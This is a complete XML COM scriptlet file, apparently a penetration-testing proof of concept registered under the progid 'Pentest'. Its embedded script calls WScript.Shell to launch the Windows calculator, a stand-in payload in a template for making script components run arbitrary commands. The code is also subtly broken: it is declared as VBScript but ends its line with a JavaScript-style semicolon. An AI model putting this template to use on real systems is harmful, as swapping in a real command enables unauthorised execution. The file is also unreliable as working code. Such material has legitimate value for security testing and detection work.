<?XML version="1.0"?>
<scriptlet>
<registration         
progid="Pentest"       
classid="{0000f35c-0000-0000-0000-53f1dabbf371}" >
<script language="VBScript">
 
<![CDATA[   
	CreateObject("WScript.Shell").Run("calc"); 
]]>
</script>
</registration>
</scriptlet>